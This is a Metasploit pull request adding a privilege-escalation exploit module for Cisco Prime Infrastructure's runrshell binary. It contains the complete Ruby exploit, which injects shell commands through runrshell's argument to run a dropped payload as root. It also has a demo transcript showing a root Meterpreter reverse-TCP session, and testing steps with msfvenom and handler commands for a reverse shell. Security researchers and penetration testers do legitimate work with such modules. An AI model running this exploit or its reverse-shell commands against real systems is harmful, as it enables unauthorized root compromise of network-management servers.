### PR TITLE
Add Privilege Escalation Module for Cisco Prime Infrastructure's runrshell Executable

### DIFF
--- a/documentation/modules/exploit/linux/local/cpi_runrshell_priv_esc.md
+++ b/documentation/modules/exploit/linux/local/cpi_runrshell_priv_esc.md
@@ -1,0 +1,20 @@
+## Description
+
+This modules exploits a vulnerability in Cisco Prime Infrastructure's runrshell binary. The runrshell binary is meant to execute a shell script as root, but can be abused to inject extra commands in the argument, allowing you to execute anything as root. It was originally discovered by Pedro Ribeiro, and chained in the CVE-2018-15379 exploit.
+
+## Demo
+
+```
+msf5 exploit(linux/local/cpi_runrshell_priv_esc) > run
+
+[*] Started reverse TCP handler on 192.168.0.21:4455 
+[*] Uploading /tmp/ffBKRLxmTm.bin
+[*] chmod the file with +x
+[*] Executing /tmp/ffBKRLxmTm.bin
+[*] Sending stage (985320 bytes) to 192.168.0.23
+[*] Meterpreter session 10 opened (192.168.0.21:4455 -> 192.168.0.23:58920) at 2019-06-10 10:09:49 -0500
+
+meterpreter > getuid
+Server username: uid=0, gid=0, euid=0, egid=0
+```
+

--- a/documentation/modules/exploit/linux/local/cpi_runrshell_priv_esc.md
+++ b/documentation/modules/exploit/linux/local/cpi_runrshell_priv_esc.md
@@ -7,14 +7,16 @@ This modules exploits a vulnerability in Cisco Prime Infrastructure's runrshell 
 ```
 msf5 exploit(linux/local/cpi_runrshell_priv_esc) > run
 
-[*] Started reverse TCP handler on 192.168.0.21:4455 
-[*] Uploading /tmp/ffBKRLxmTm.bin
+[*] Started reverse TCP handler on 192.168.0.21:4444 
+[*] Uploading /tmp/mYVrqmsETa.bin
 [*] chmod the file with +x
-[*] Executing /tmp/ffBKRLxmTm.bin
+[*] Executing /tmp/mYVrqmsETa.bin
 [*] Sending stage (985320 bytes) to 192.168.0.23
-[*] Meterpreter session 10 opened (192.168.0.21:4455 -> 192.168.0.23:58920) at 2019-06-10 10:09:49 -0500
+[*] Meterpreter session 4 opened (192.168.0.21:4444 -> 192.168.0.23:55554) at 2019-06-10 11:18:13 -0500
+[+] Deleted /tmp/mYVrqmsETa.bin
 
 meterpreter > getuid
 Server username: uid=0, gid=0, euid=0, egid=0
+meterpreter > 
 ```
 

--- a/modules/exploits/linux/local/cpi_runrshell_priv_esc.rb
+++ b/modules/exploits/linux/local/cpi_runrshell_priv_esc.rb
@@ -8,6 +8,7 @@ class MetasploitModule < Msf::Exploit::Local
 
   include Msf::Post::File
   include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
 
   def initialize(info = {})
     super( update_info( info,
@@ -59,6 +60,7 @@ class MetasploitModule < Msf::Exploit::Local
       return
     end
 
+    register_file_for_cleanup(exe_path)
     print_status('chmod the file with +x')
     exec_as_root("/bin/chmod +x #{exe_path}")
     print_status("Executing #{exe_path}")

--- a/modules/exploits/linux/local/cpi_runrshell_priv_esc.rb
+++ b/modules/exploits/linux/local/cpi_runrshell_priv_esc.rb
@@ -8,7 +8,6 @@ class MetasploitModule < Msf::Exploit::Local
 
   include Msf::Post::File
   include Msf::Exploit::EXE
-  include Msf::Exploit::FileDropper
 
   def initialize(info = {})
     super( update_info( info,
@@ -27,7 +26,7 @@ class MetasploitModule < Msf::Exploit::Local
       'Platform'       => ['linux'],
       'Arch'           => [ARCH_X86, ARCH_X64],
       'SessionTypes'   => ['shell', 'meterpreter'],
-      'DisclosureDate' => '2016-05-04',
+      'DisclosureDate' => '2018-12-08',
       'Privileged'     => true,
       'References'     =>
         [

--- a/modules/exploits/linux/local/cpi_runrshell_priv_esc.rb
+++ b/modules/exploits/linux/local/cpi_runrshell_priv_esc.rb
@@ -1,0 +1,68 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super( update_info( info,
+      'Name'           => 'Cisco Prime Infrastructure Runrshell Privilege Escalation',
+      'Description'    => %q{
+        This modules exploits a vulnerability in Cisco Prime Infrastructure's runrshell binary. The
+        runrshell binary is meant to execute a shell script as root, but can be abused to inject
+        extra commands in the argument, allowing you to execute anything as root.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Pedro Ribeiro <pedrib[at]gmail.com>', # First discovery
+          'sinn3r'                               # Metasploit module
+        ],
+      'Platform'       => ['linux'],
+      'Arch'           => [ARCH_X86, ARCH_X64],
+      'SessionTypes'   => ['shell', 'meterpreter'],
+      'DisclosureDate' => '2016-05-04',
+      'Privileged'     => true,
+      'References'     =>
+        [
+          ['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/cisco-prime-infrastructure.txt#L56'],
+        ],
+      'Targets'        =>
+        [
+          [ 'Cisco Prime Infrastructure 3.4.0', {} ]
+        ],
+      'DefaultTarget'  => 0
+     ))
+
+    register_advanced_options [
+      OptString.new('WritableDir', [true, 'A directory where we can write the payload', '/tmp'])
+    ]
+  end
+
+  def exec_as_root(cmd)
+    command_string = "/opt/CSCOlumos/bin/runrshell '\" && #{cmd} #'"
+    vprint_status(cmd_exec(command_string))
+  end
+
+  def exploit
+    payload_name = "#{Rex::Text.rand_text_alpha(10)}.bin"
+    exe_path = Rex::FileUtils.normalize_unix_path(datastore['WritableDir'], payload_name)
+    print_status("Uploading #{exe_path}")
+    write_file(exe_path, generate_payload_exe)
+    unless file?(exe_path)
+      print_error("Failed to upload #{exe_path}")
+      return
+    end
+
+    print_status('chmod the file with +x')
+    exec_as_root("/bin/chmod +x #{exe_path}")
+    print_status("Executing #{exe_path}")
+    exec_as_root(exe_path)
+  end
+end


### PR DESCRIPTION
## Description

This modules exploits a vulnerability in Cisco Prime Infrastructure's runrshell binary. The runrshell binary is meant to execute a shell script as root, but can be abused to inject extra commands in the argument, allowing you to execute anything as root. It was originally discovered by Pedro Ribeiro, and chained in the CVE-2018-15379 exploit. I also saw this being used again in Steven Seeley's CPI HealthMonitor exploit's [writeup](https://srcincite.io/blog/2019/05/17/panic-at-the-cisco-unauthenticated-rce-in-prime-infrastructure.html).

## Vulnerable Setup

Cisco Prime Infrastructure 3.4.0 (or prior) is needed, and make sure have the following to set up the VM image:

* 4 CPU cores.
* 12288 MB of RAM (12 GB)
* 350 GB of hard drive space

## Testing

- [ ] Log into the shell on the VM, and execute `/opt/CSCOlumos/bin/getSCPcredentials.sh` to generate a credential for scp
- [ ] Generate a payload: `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=4444  -o /tmp/payload.bin`
- [ ] scp the payload to CPI
- [ ] In msfconsole, start a handler: `handler -p linux/x86/meterpreter/reverse_tcp -H 0.0.0.0 -P 4444`, and get a shell.
- [ ] run `linux/local/cpi_runrshell_priv_esc`. You should get a session, and guid should show as `uid=0, gid=0, euid=0, egid=0`